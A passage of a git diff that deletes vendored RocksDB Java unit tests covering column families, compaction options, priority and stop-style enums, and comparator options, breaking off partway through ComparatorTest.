-  }
-
-  @Test
-  public void createColumnFamily() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      final ColumnFamilyHandle columnFamilyHandle = db.createColumnFamily(
-          new ColumnFamilyDescriptor("new_cf".getBytes(),
-              new ColumnFamilyOptions()));
-      try {
-        final List<byte[]> columnFamilyNames = RocksDB.listColumnFamilies(
-            options, dbFolder.getRoot().getAbsolutePath());
-        assertThat(columnFamilyNames).isNotNull();
-        assertThat(columnFamilyNames.size()).isGreaterThan(0);
-        assertThat(columnFamilyNames.size()).isEqualTo(2);
-        assertThat(new String(columnFamilyNames.get(0))).isEqualTo("default");
-        assertThat(new String(columnFamilyNames.get(1))).isEqualTo("new_cf");
-      } finally {
-        columnFamilyHandle.close();
-      }
-    }
-  }
-
-  @Test
-  public void openWithColumnFamilies() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfNames = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes())
-    );
-
-    final List<ColumnFamilyHandle> columnFamilyHandleList =
-        new ArrayList<>();
-
-    // Test open database with column family names
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfNames,
-             columnFamilyHandleList)) {
-
-      try {
-        assertThat(columnFamilyHandleList.size()).isEqualTo(2);
-        db.put("dfkey1".getBytes(), "dfvalue".getBytes());
-        db.put(columnFamilyHandleList.get(0), "dfkey2".getBytes(),
-            "dfvalue".getBytes());
-        db.put(columnFamilyHandleList.get(1), "newcfkey1".getBytes(),
-            "newcfvalue".getBytes());
-
-        String retVal = new String(db.get(columnFamilyHandleList.get(1),
-            "newcfkey1".getBytes()));
-        assertThat(retVal).isEqualTo("newcfvalue");
-        assertThat((db.get(columnFamilyHandleList.get(1),
-            "dfkey1".getBytes()))).isNull();
-        db.remove(columnFamilyHandleList.get(1), "newcfkey1".getBytes());
-        assertThat((db.get(columnFamilyHandleList.get(1),
-            "newcfkey1".getBytes()))).isNull();
-        db.remove(columnFamilyHandleList.get(0), new WriteOptions(),
-            "dfkey2".getBytes());
-        assertThat(db.get(columnFamilyHandleList.get(0), new ReadOptions(),
-            "dfkey2".getBytes())).isNull();
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void getWithOutValueAndCf() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-
-    // Test open database with column family names
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      try {
-        db.put(columnFamilyHandleList.get(0), new WriteOptions(),
-            "key1".getBytes(), "value".getBytes());
-        db.put("key2".getBytes(), "12345678".getBytes());
-        final byte[] outValue = new byte[5];
-        // not found value
-        int getResult = db.get("keyNotFound".getBytes(), outValue);
-        assertThat(getResult).isEqualTo(RocksDB.NOT_FOUND);
-        // found value which fits in outValue
-        getResult = db.get(columnFamilyHandleList.get(0), "key1".getBytes(),
-            outValue);
-        assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-        assertThat(outValue).isEqualTo("value".getBytes());
-        // found value which fits partially
-        getResult = db.get(columnFamilyHandleList.get(0), new ReadOptions(),
-            "key2".getBytes(), outValue);
-        assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-        assertThat(outValue).isEqualTo("12345".getBytes());
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void createWriteDropColumnFamily() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      ColumnFamilyHandle tmpColumnFamilyHandle = null;
-      try {
-        tmpColumnFamilyHandle = db.createColumnFamily(
-            new ColumnFamilyDescriptor("tmpCF".getBytes(),
-                new ColumnFamilyOptions()));
-        db.put(tmpColumnFamilyHandle, "key".getBytes(), "value".getBytes());
-        db.dropColumnFamily(tmpColumnFamilyHandle);
-      } finally {
-        if (tmpColumnFamilyHandle != null) {
-          tmpColumnFamilyHandle.close();
-        }
-        for (ColumnFamilyHandle columnFamilyHandle : columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void writeBatch() throws RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final ColumnFamilyOptions defaultCfOptions = new ColumnFamilyOptions()
-             .setMergeOperator(stringAppendOperator)) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY,
-              defaultCfOptions),
-          new ColumnFamilyDescriptor("new_cf".getBytes()));
-      final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-      try (final DBOptions options = new DBOptions()
-          .setCreateIfMissing(true)
-          .setCreateMissingColumnFamilies(true);
-           final RocksDB db = RocksDB.open(options,
-               dbFolder.getRoot().getAbsolutePath(),
-               cfDescriptors, columnFamilyHandleList);
-           final WriteBatch writeBatch = new WriteBatch();
-           final WriteOptions writeOpt = new WriteOptions()) {
-        try {
-          writeBatch.put("key".getBytes(), "value".getBytes());
-          writeBatch.put(db.getDefaultColumnFamily(),
-              "mergeKey".getBytes(), "merge".getBytes());
-          writeBatch.merge(db.getDefaultColumnFamily(), "mergeKey".getBytes(),
-              "merge".getBytes());
-          writeBatch.put(columnFamilyHandleList.get(1), "newcfkey".getBytes(),
-              "value".getBytes());
-          writeBatch.put(columnFamilyHandleList.get(1), "newcfkey2".getBytes(),
-              "value2".getBytes());
-          writeBatch.remove("xyz".getBytes());
-          writeBatch.remove(columnFamilyHandleList.get(1), "xyz".getBytes());
-          db.write(writeOpt, writeBatch);
-
-          assertThat(db.get(columnFamilyHandleList.get(1),
-              "xyz".getBytes()) == null);
-          assertThat(new String(db.get(columnFamilyHandleList.get(1),
-              "newcfkey".getBytes()))).isEqualTo("value");
-          assertThat(new String(db.get(columnFamilyHandleList.get(1),
-              "newcfkey2".getBytes()))).isEqualTo("value2");
-          assertThat(new String(db.get("key".getBytes()))).isEqualTo("value");
-          // check if key is merged
-          assertThat(new String(db.get(db.getDefaultColumnFamily(),
-              "mergeKey".getBytes()))).isEqualTo("merge,merge");
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              columnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void iteratorOnColumnFamily() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-
-        db.put(columnFamilyHandleList.get(1), "newcfkey".getBytes(),
-            "value".getBytes());
-        db.put(columnFamilyHandleList.get(1), "newcfkey2".getBytes(),
-            "value2".getBytes());
-        try (final RocksIterator rocksIterator =
-                 db.newIterator(columnFamilyHandleList.get(1))) {
-          rocksIterator.seekToFirst();
-          Map<String, String> refMap = new HashMap<>();
-          refMap.put("newcfkey", "value");
-          refMap.put("newcfkey2", "value2");
-          int i = 0;
-          while (rocksIterator.isValid()) {
-            i++;
-            assertThat(refMap.get(new String(rocksIterator.key()))).
-                isEqualTo(new String(rocksIterator.value()));
-            rocksIterator.next();
-          }
-          assertThat(i).isEqualTo(2);
-        }
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void multiGet() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        db.put(columnFamilyHandleList.get(0), "key".getBytes(),
-            "value".getBytes());
-        db.put(columnFamilyHandleList.get(1), "newcfkey".getBytes(),
-            "value".getBytes());
-
-        final List<byte[]> keys = Arrays.asList(new byte[][]{
-            "key".getBytes(), "newcfkey".getBytes()
-        });
-        Map<byte[], byte[]> retValues = db.multiGet(columnFamilyHandleList,
-            keys);
-        assertThat(retValues.size()).isEqualTo(2);
-        assertThat(new String(retValues.get(keys.get(0))))
-            .isEqualTo("value");
-        assertThat(new String(retValues.get(keys.get(1))))
-            .isEqualTo("value");
-        retValues = db.multiGet(new ReadOptions(), columnFamilyHandleList,
-            keys);
-        assertThat(retValues.size()).isEqualTo(2);
-        assertThat(new String(retValues.get(keys.get(0))))
-            .isEqualTo("value");
-        assertThat(new String(retValues.get(keys.get(1))))
-            .isEqualTo("value");
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void properties() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        assertThat(db.getProperty("rocksdb.estimate-num-keys")).
-            isNotNull();
-        assertThat(db.getLongProperty(columnFamilyHandleList.get(0),
-            "rocksdb.estimate-num-keys")).isGreaterThanOrEqualTo(0);
-        assertThat(db.getProperty("rocksdb.stats")).isNotNull();
-        assertThat(db.getProperty(columnFamilyHandleList.get(0),
-            "rocksdb.sstables")).isNotNull();
-        assertThat(db.getProperty(columnFamilyHandleList.get(1),
-            "rocksdb.estimate-num-keys")).isNotNull();
-        assertThat(db.getProperty(columnFamilyHandleList.get(1),
-            "rocksdb.stats")).isNotNull();
-        assertThat(db.getProperty(columnFamilyHandleList.get(1),
-            "rocksdb.sstables")).isNotNull();
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-
-  @Test
-  public void iterators() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      List<RocksIterator> iterators = null;
-      try {
-        iterators = db.newIterators(columnFamilyHandleList);
-        assertThat(iterators.size()).isEqualTo(2);
-        RocksIterator iter = iterators.get(0);
-        iter.seekToFirst();
-        final Map<String, String> defRefMap = new HashMap<>();
-        defRefMap.put("dfkey1", "dfvalue");
-        defRefMap.put("key", "value");
-        while (iter.isValid()) {
-          assertThat(defRefMap.get(new String(iter.key()))).
-              isEqualTo(new String(iter.value()));
-          iter.next();
-        }
-        // iterate over new_cf key/value pairs
-        final Map<String, String> cfRefMap = new HashMap<>();
-        cfRefMap.put("newcfkey", "value");
-        cfRefMap.put("newcfkey2", "value2");
-        iter = iterators.get(1);
-        iter.seekToFirst();
-        while (iter.isValid()) {
-          assertThat(cfRefMap.get(new String(iter.key()))).
-              isEqualTo(new String(iter.value()));
-          iter.next();
-        }
-      } finally {
-        if (iterators != null) {
-          for (final RocksIterator rocksIterator : iterators) {
-            rocksIterator.close();
-          }
-        }
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failPutDisposedCF() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        db.dropColumnFamily(columnFamilyHandleList.get(1));
-        db.put(columnFamilyHandleList.get(1), "key".getBytes(),
-            "value".getBytes());
-      } finally {
-        for (ColumnFamilyHandle columnFamilyHandle : columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failRemoveDisposedCF() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        db.dropColumnFamily(columnFamilyHandleList.get(1));
-        db.remove(columnFamilyHandleList.get(1), "key".getBytes());
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failGetDisposedCF() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      try {
-        db.dropColumnFamily(columnFamilyHandleList.get(1));
-        db.get(columnFamilyHandleList.get(1), "key".getBytes());
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failMultiGetWithoutCorrectNumberOfCF() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      try {
-        final List<byte[]> keys = new ArrayList<>();
-        keys.add("key".getBytes());
-        keys.add("newcfkey".getBytes());
-        final List<ColumnFamilyHandle> cfCustomList = new ArrayList<>();
-        db.multiGet(cfCustomList, keys);
-
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void testByteCreateFolumnFamily() throws RocksDBException {
-
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      final byte[] b0 = new byte[]{(byte) 0x00};
-      final byte[] b1 = new byte[]{(byte) 0x01};
-      final byte[] b2 = new byte[]{(byte) 0x02};
-      ColumnFamilyHandle cf1 = null, cf2 = null, cf3 = null;
-      try {
-        cf1 = db.createColumnFamily(new ColumnFamilyDescriptor(b0));
-        cf2 = db.createColumnFamily(new ColumnFamilyDescriptor(b1));
-        final List<byte[]> families = RocksDB.listColumnFamilies(options,
-            dbFolder.getRoot().getAbsolutePath());
-        assertThat(families).contains("default".getBytes(), b0, b1);
-        cf3 = db.createColumnFamily(new ColumnFamilyDescriptor(b2));
-      } finally {
-        if (cf1 != null) {
-          cf1.close();
-        }
-        if (cf2 != null) {
-          cf2.close();
-        }
-        if (cf3 != null) {
-          cf3.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void testCFNamesWithZeroBytes() throws RocksDBException {
-    ColumnFamilyHandle cf1 = null, cf2 = null;
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-    ) {
-      try {
-        final byte[] b0 = new byte[]{0, 0};
-        final byte[] b1 = new byte[]{0, 1};
-        cf1 = db.createColumnFamily(new ColumnFamilyDescriptor(b0));
-        cf2 = db.createColumnFamily(new ColumnFamilyDescriptor(b1));
-        final List<byte[]> families = RocksDB.listColumnFamilies(options,
-            dbFolder.getRoot().getAbsolutePath());
-        assertThat(families).contains("default".getBytes(), b0, b1);
-      } finally {
-        if (cf1 != null) {
-          cf1.close();
-        }
-        if (cf2 != null) {
-          cf2.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void testCFNameSimplifiedChinese() throws RocksDBException {
-    ColumnFamilyHandle columnFamilyHandle = null;
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-    ) {
-      try {
-        final String simplifiedChinese = "\u7b80\u4f53\u5b57";
-        columnFamilyHandle = db.createColumnFamily(
-            new ColumnFamilyDescriptor(simplifiedChinese.getBytes()));
-
-        final List<byte[]> families = RocksDB.listColumnFamilies(options,
-            dbFolder.getRoot().getAbsolutePath());
-        assertThat(families).contains("default".getBytes(),
-            simplifiedChinese.getBytes());
-      } finally {
-        if (columnFamilyHandle != null) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java
deleted file mode 100644
index 370a28e..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java
+++ /dev/null
@@ -1,26 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompactionOptionsFIFOTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void maxTableFilesSize() {
-    final long size = 500 * 1024 * 1026;
-    try(final CompactionOptionsFIFO opt = new CompactionOptionsFIFO()) {
-      opt.setMaxTableFilesSize(size);
-      assertThat(opt.maxTableFilesSize()).isEqualTo(size);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java
deleted file mode 100644
index 5e2d195..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompactionOptionsUniversalTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void sizeRatio() {
-    final int sizeRatio = 4;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setSizeRatio(sizeRatio);
-      assertThat(opt.sizeRatio()).isEqualTo(sizeRatio);
-    }
-  }
-
-  @Test
-  public void minMergeWidth() {
-    final int minMergeWidth = 3;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setMinMergeWidth(minMergeWidth);
-      assertThat(opt.minMergeWidth()).isEqualTo(minMergeWidth);
-    }
-  }
-
-  @Test
-  public void maxMergeWidth() {
-    final int maxMergeWidth = Integer.MAX_VALUE - 1234;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setMaxMergeWidth(maxMergeWidth);
-      assertThat(opt.maxMergeWidth()).isEqualTo(maxMergeWidth);
-    }
-  }
-
-  @Test
-  public void maxSizeAmplificationPercent() {
-    final int maxSizeAmplificationPercent = 150;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setMaxSizeAmplificationPercent(maxSizeAmplificationPercent);
-      assertThat(opt.maxSizeAmplificationPercent()).isEqualTo(maxSizeAmplificationPercent);
-    }
-  }
-
-  @Test
-  public void compressionSizePercent() {
-    final int compressionSizePercent = 500;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setCompressionSizePercent(compressionSizePercent);
-      assertThat(opt.compressionSizePercent()).isEqualTo(compressionSizePercent);
-    }
-  }
-
-  @Test
-  public void stopStyle() {
-    final CompactionStopStyle stopStyle = CompactionStopStyle.CompactionStopStyleSimilarSize;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setStopStyle(stopStyle);
-      assertThat(opt.stopStyle()).isEqualTo(stopStyle);
-    }
-  }
-
-  @Test
-  public void allowTrivialMove() {
-    final boolean allowTrivialMove = true;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setAllowTrivialMove(allowTrivialMove);
-      assertThat(opt.allowTrivialMove()).isEqualTo(allowTrivialMove);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionPriorityTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionPriorityTest.java
deleted file mode 100644
index b078e13..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionPriorityTest.java
+++ /dev/null
@@ -1,31 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompactionPriorityTest {
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failIfIllegalByteValueProvided() {
-    CompactionPriority.getCompactionPriority((byte) -1);
-  }
-
-  @Test
-  public void getCompactionPriority() {
-    assertThat(CompactionPriority.getCompactionPriority(
-        CompactionPriority.OldestLargestSeqFirst.getValue()))
-            .isEqualTo(CompactionPriority.OldestLargestSeqFirst);
-  }
-
-  @Test
-  public void valueOf() {
-    assertThat(CompactionPriority.valueOf("OldestSmallestSeqFirst")).
-        isEqualTo(CompactionPriority.OldestSmallestSeqFirst);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java
deleted file mode 100644
index 4c8a209..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java
+++ /dev/null
@@ -1,31 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompactionStopStyleTest {
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failIfIllegalByteValueProvided() {
-    CompactionStopStyle.getCompactionStopStyle((byte) -1);
-  }
-
-  @Test
-  public void getCompactionStopStyle() {
-    assertThat(CompactionStopStyle.getCompactionStopStyle(
-        CompactionStopStyle.CompactionStopStyleTotalSize.getValue()))
-            .isEqualTo(CompactionStopStyle.CompactionStopStyleTotalSize);
-  }
-
-  @Test
-  public void valueOf() {
-    assertThat(CompactionStopStyle.valueOf("CompactionStopStyleSimilarSize")).
-        isEqualTo(CompactionStopStyle.CompactionStopStyleSimilarSize);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java
deleted file mode 100644
index a45c717..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ComparatorOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void comparatorOptions() {
-    try(final ComparatorOptions copt = new ComparatorOptions()) {
-
-      assertThat(copt).isNotNull();
-      // UseAdaptiveMutex test
-      copt.setUseAdaptiveMutex(true);
-      assertThat(copt.useAdaptiveMutex()).isTrue();
-
-      copt.setUseAdaptiveMutex(false);
-      assertThat(copt.useAdaptiveMutex()).isFalse();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorTest.java
deleted file mode 100644
index 63dee72..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorTest.java
+++ /dev/null
@@ -1,200 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.io.IOException;
-import java.nio.file.FileSystems;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ComparatorTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-     public void javaComparator() throws IOException, RocksDBException {
-
-    final AbstractComparatorTest comparatorTest = new AbstractComparatorTest() {
-      @Override
-      public AbstractComparator getAscendingIntKeyComparator() {
-        return new Comparator(new ComparatorOptions()) {
-
-          @Override
-          public String name() {
-            return "test.AscendingIntKeyComparator";
-          }
-
-          @Override
-          public int compare(final Slice a, final Slice b) {
-            return compareIntKeys(a.data(), b.data());
-          }
-        };
-      }
-    };
-
-    // test the round-tripability of keys written and read with the Comparator
-    comparatorTest.testRoundtrip(FileSystems.getDefault().getPath(
-        dbFolder.getRoot().getAbsolutePath()));
-  }
-
-  @Test
-  public void javaComparatorCf() throws IOException, RocksDBException {
-
-    final AbstractComparatorTest comparatorTest = new AbstractComparatorTest() {
-      @Override
-      public AbstractComparator getAscendingIntKeyComparator() {
